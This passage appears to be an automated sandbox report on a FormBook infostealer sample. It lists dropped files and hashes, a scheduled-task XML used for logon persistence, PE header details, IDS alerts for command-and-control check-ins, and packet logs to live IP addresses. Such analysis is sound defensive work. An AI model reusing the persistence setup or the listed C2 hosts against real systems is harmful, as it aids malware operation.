                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kibruxtj.im2.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3gemjeh.our.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_winn5gu0.h3t.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuonz50t.ybr.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\tmpB814.tmp

                                Download File
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1585
                                Entropy (8bit):5.109234113981608
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                                MD5:5E6C3BBA44F1F71F272A960039D7A7A7
                                SHA1:F9FC46C2E3C7A408274A34A69C3EEE2C6176FE6D
                                SHA-256:90E90821E49A22AAB791091DB1F643886CC59599B19199376FE30EEBAD7F5940
                                SHA-512:A383136577E21840D852741FB1D1F50311015BEE4C2C1012B9852A38B3FE3536D0D15B1EB16ACDD30C2C8CB73E8051E3CF6513686782C0754E78C5B5F3BA9C6A
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Local\Temp\tmpD59E.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1585
                                Entropy (8bit):5.109234113981608
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                                MD5:5E6C3BBA44F1F71F272A960039D7A7A7
                                SHA1:F9FC46C2E3C7A408274A34A69C3EEE2C6176FE6D
                                SHA-256:90E90821E49A22AAB791091DB1F643886CC59599B19199376FE30EEBAD7F5940
                                SHA-512:A383136577E21840D852741FB1D1F50311015BEE4C2C1012B9852A38B3FE3536D0D15B1EB16ACDD30C2C8CB73E8051E3CF6513686782C0754E78C5B5F3BA9C6A
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Local\Temp\y14291878

                                Download File
                                Process:C:\Windows\SysWOW64\print.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.121297215059106
                                Encrypted:false
                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                Malicious:false
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe

                                Download File
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1097216
                                Entropy (8bit):6.832565299784811
                                Encrypted:false
                                SSDEEP:12288:iyQaMFM0Mvxv96lPGfGAS3aczHjOpJ5bX9Ek1GgO5vcJX32n4DVRTIVEhbWy:iyjv9olufGasDO1JkgkcJ2nyVRTFhb
                                MD5:E34C33903020A81F3A09A69C29ADE426
                                SHA1:864AAA5821E9F3E99DA71EFF1C8B76BCD1CDEA80
                                SHA-256:C9062D78EE63874928E2D332A8ED0570E99BC06E544E33F002B26F70E0C19510
                                SHA-512:8B7CB1875BF7F9F39759585A5479F330089231B97F07B199728448489368656EC3D7E27F763988A76D3ACECF9E7E093A8A64A83F8F609BC9EC4636379329D9AA
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 66%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e................0.................. ........@.. ....................... ............@.....................................O......................................p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.........................................................................r...p}.....r...p}......}.....(.......(.....*...0...........sC.....(......o....&.(.....*....0...........s9.....(......o....&.(.....*....0...........s%.....(......o....&.(.....*....0...........s5.....(......o....&.(.....*....0..+.........,..{.......+....,...{....o........(.....*..0..{.............(....s......s....}.....s....}.....s....}.....s....}.....s ...}.....s ...}.....s ...}.....s!...}.....s!...}....

                                C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe:Zone.Identifier

                                Download File
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):6.832565299784811
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:UnmxRI.exe
                                File size:1'097'216 bytes
                                MD5:e34c33903020a81f3a09a69c29ade426
                                SHA1:864aaa5821e9f3e99da71eff1c8b76bcd1cdea80
                                SHA256:c9062d78ee63874928e2d332a8ed0570e99bc06e544e33f002b26f70e0c19510
                                SHA512:8b7cb1875bf7f9f39759585a5479f330089231b97f07b199728448489368656ec3d7e27f763988a76d3acecf9e7e093a8a64a83f8f609bc9ec4636379329d9aa
                                SSDEEP:12288:iyQaMFM0Mvxv96lPGfGAS3aczHjOpJ5bX9Ek1GgO5vcJX32n4DVRTIVEhbWy:iyjv9olufGasDO1JkgkcJ2nyVRTFhb
                                TLSH:2A35A03D1DF88227B978D6A6DFA0C432B061D6EFF5629D29D4D746818702A03B4C71BE
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e.................0.................. ........@.. ....................... ............@................................

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x50d30e
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xB2BAD165 [Wed Jan 7 21:02:29 2065 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x10d2b90x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x10e0000x594.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x10a6d40x70.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x10b3140x10b400e81c629261b42ce8d76248db295e80f3False0.6886245541978484data6.837498475160513IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0x10e0000x5940x600ca9ed516509c6b92b6eca539635d9ae4False0.419921875data4.057525652496838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1100000xc0x200dc497a787fee1cbd39fc99f6ec350b43False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0x10e0900x304data0.44041450777202074
                                RT_MANIFEST0x10e3a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                2024-08-30T07:19:13.142223+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514972680192.168.2.552.9.242.57
                                2024-08-30T07:18:35.434943+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514971780192.168.2.591.195.240.19
                                2024-08-30T07:21:13.661153+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975080192.168.2.591.195.240.19
                                2024-08-30T07:20:51.661641+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974680192.168.2.5122.10.12.59
                                2024-08-30T07:21:52.389719+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975880192.168.2.5212.32.237.90
                                2024-08-30T07:19:49.860329+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514973480192.168.2.5119.18.54.85
                                2024-08-30T07:20:24.305204+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514973880192.168.2.566.29.154.248
                                2024-08-30T07:21:35.712132+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975480192.168.2.5216.40.34.41
                                2024-08-30T07:20:37.687030+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974280192.168.2.5104.21.92.135
                                2024-08-30T07:19:35.231734+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514973080192.168.2.591.195.240.19
                                2024-08-30T07:18:59.865503+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514972280192.168.2.5167.172.228.26
                                2024-08-30T07:22:07.118884+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976280192.168.2.5167.172.228.26

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 30, 2024 07:18:34.764072895 CEST4971780192.168.2.591.195.240.19
                                Aug 30, 2024 07:18:34.775548935 CEST804971791.195.240.19192.168.2.5
                                Aug 30, 2024 07:18:34.775753975 CEST4971780192.168.2.591.195.240.19
                                Aug 30, 2024 07:18:34.776391029 CEST4971780192.168.2.591.195.240.19
                                Aug 30, 2024 07:18:34.781572104 CEST804971791.195.240.19192.168.2.5
                                Aug 30, 2024 07:18:35.434683084 CEST804971791.195.240.19192.168.2.5
                                Aug 30, 2024 07:18:35.434834003 CEST804971791.195.240.19192.168.2.5
                                Aug 30, 2024 07:18:35.434942961 CEST4971780192.168.2.591.195.240.19
                                Aug 30, 2024 07:18:35.435612917 CEST4971780192.168.2.591.195.240.19
                                Aug 30, 2024 07:18:35.440340042 CEST804971791.195.240.19192.168.2.5
                                Aug 30, 2024 07:18:51.218518019 CEST4971880192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:51.223342896 CEST8049718167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:51.223431110 CEST4971880192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:51.223649025 CEST4971880192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:51.228432894 CEST8049718167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:51.909374952 CEST8049718167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:51.909588099 CEST8049718167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:51.909686089 CEST4971880192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:52.726310968 CEST4971880192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:53.742031097 CEST4971980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:53.748997927 CEST8049719167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:53.749182940 CEST4971980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:53.749242067 CEST4971980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:53.754736900 CEST8049719167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:55.257510900 CEST4971980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:55.265563011 CEST8049719167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:55.265635967 CEST4971980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:56.273353100 CEST4972180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:56.278347969 CEST8049721167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:56.278475046 CEST4972180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:56.278666973 CEST4972180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:56.283603907 CEST8049721167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:56.284050941 CEST8049721167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:57.788738012 CEST4972180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:57.794327021 CEST8049721167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:57.794404984 CEST4972180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:58.804889917 CEST4972280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:59.157290936 CEST8049722167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:59.157409906 CEST4972280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:59.157587051 CEST4972280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:59.162579060 CEST8049722167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:59.864928961 CEST8049722167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:59.865385056 CEST8049722167.172.228.26192.168.2.5
                                Aug 30, 2024 07:18:59.865503073 CEST4972280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:59.865535021 CEST4972280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:18:59.870322943 CEST8049722167.172.228.26192.168.2.5
                                Aug 30, 2024 07:19:04.902966022 CEST4972380192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:04.907948017 CEST804972352.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:04.908030987 CEST4972380192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:04.908191919 CEST4972380192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:04.913140059 CEST804972352.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:05.516459942 CEST804972352.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:05.516479015 CEST804972352.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:05.516499996 CEST804972352.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:05.516519070 CEST804972352.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:05.516542912 CEST4972380192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:05.516585112 CEST4972380192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:05.516597033 CEST804972352.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:05.516648054 CEST4972380192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:06.413701057 CEST4972380192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:07.429584980 CEST4972480192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:07.445816040 CEST804972452.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:07.445905924 CEST4972480192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:07.446475029 CEST4972480192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:07.453891993 CEST804972452.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:08.076946020 CEST804972452.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:08.076971054 CEST804972452.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:08.076984882 CEST804972452.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:08.076997995 CEST804972452.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:08.077017069 CEST4972480192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:08.077054977 CEST4972480192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:08.969034910 CEST4972480192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:09.979302883 CEST4972580192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:09.984751940 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:09.984813929 CEST4972580192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:09.985129118 CEST4972580192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:09.990300894 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:09.990319014 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:10.579782009 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:10.579798937 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:10.579813004 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:10.579843998 CEST4972580192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:10.579905987 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:10.580276966 CEST804972552.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:10.580327988 CEST4972580192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:11.501921892 CEST4972580192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:12.507810116 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:12.514841080 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:12.514951944 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:12.515137911 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:12.522211075 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142031908 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142117977 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142222881 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:13.142363071 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142474890 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142488956 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142501116 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142513037 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142524004 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:13.142533064 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142545938 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142589092 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:13.142606974 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:13.142735004 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:13.142800093 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:13.142838001 CEST4972680192.168.2.552.9.242.57
                                Aug 30, 2024 07:19:13.147721052 CEST804972652.9.242.57192.168.2.5
                                Aug 30, 2024 07:19:26.980176926 CEST4972780192.168.2.591.195.240.19
                                Aug 30, 2024 07:19:26.985372066 CEST804972791.195.240.19192.168.2.5
                                Aug 30, 2024 07:19:26.987540007 CEST4972780192.168.2.591.195.240.19
